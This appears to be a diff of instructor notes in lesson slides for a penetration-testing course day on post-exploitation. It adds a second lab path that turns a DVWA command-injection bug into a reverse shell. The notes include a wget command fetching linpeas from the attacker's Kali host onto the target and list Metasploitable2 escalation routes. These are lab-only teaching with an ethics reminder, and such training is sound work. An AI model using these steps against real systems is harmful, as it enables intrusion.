--- a/lessons-v2/day17/day17.pptx
+++ b/lessons-v2/day17/day17.pptx
@@ -528,7 +528,7 @@
 00:00 Journey check + hook (low-priv -&gt; root in 20s)           4   ┐
 00:04 What a shell is + the post-ex goals                      5   │
 00:09 Privilege escalation                                    10   │ PART 1
-00:19 DO: shell -&gt; linpeas -&gt; priv-esc on Metasploitable2     16   │ (post-ex,
+00:19 DO: shell -&gt; priv-esc — Path A (MS2) or B (DVWA webshell) 16   │ (post-ex,
 00:35 Persistence / lateral movement / pivoting                8   │  done by :48)
 00:43 The attack chain + detection opportunities               7   ┘
 00:50 Infrastructure security                                  8   ┐
@@ -536,13 +536,15 @@
 01:06 DO: fix an open bucket / IAM policy                     10   │ (infra + cloud)
 01:16 Attack &lt;-&gt; defence + wrap + homework                     4   ┘
 CUT FIRST IF SHORT: persistence/lateral/pivot slide to 4 min; infra slide to a 4-min bullet run.
-NEVER CUT: privilege escalation + the priv-esc DO, the attack-chain-with-detection artifact,
+NEVER CUT: privilege escalation + the priv-esc DO (Path A or B — pick ONE per class, don't run
+both in the 16 min unless clearly ahead of schedule), the attack-chain-with-detection artifact,
 shared responsibility, the bucket/IAM DO.
 ANALOGY (kitchen): post-ex = you're inside after hours. Get the master key (priv-esc), prop a
 door for later (persistence), move kitchen -&gt; office -&gt; safe (lateral movement), use the
 restaurant's van to reach the warehouse (pivoting). Cloud = a chain of restaurants sharing one
 supplier who says "we lock the building; what's in your unit is your problem".
-ETHICS: Metasploitable2 / assigned lab target only (the ROE). Post-ex stays on that box.</a:t>
+ETHICS: Metasploitable2 / assigned lab target only (the ROE). Post-ex stays on that box.
+Own lab: Metasploitable2 `10.89.1.10`, DVWA `10.89.1.20` for the web-shell path.</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
@@ -1702,10 +1704,14 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>16 min. Metasploitable2 has many paths: the `distcc`/`udev`/`nfs` routes, an old kernel,
-world-writable cron. Coach the same way as Day 15.
+              <a:t>16 min. Path A: Metasploitable2 has many escalation routes — `distcc`/`udev`/`nfs`, an old
+kernel, world-writable cron. Coach the same way as Day 15.
 linpeas: `wget http://&lt;your-kali&gt;/linpeas.sh` on the target (host it with `python3 -m http.server`).
-Non-root -&gt; root is the proof. This is Phase 5 of the engagement journal.</a:t>
+Path B is the Day-16 command-injection bug taken one step further: same bug, this time used
+to open a shell instead of just proving RCE with `whoami`. It's the shortest, clearest 'a web
+bug became a backdoor' demo in the whole course — use it if the class is behind on Metasploit.
+Non-root -&gt; root (Path A) or a live reverse shell (Path B) is the proof. This is Phase 5 of the
+engagement journal either way.</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
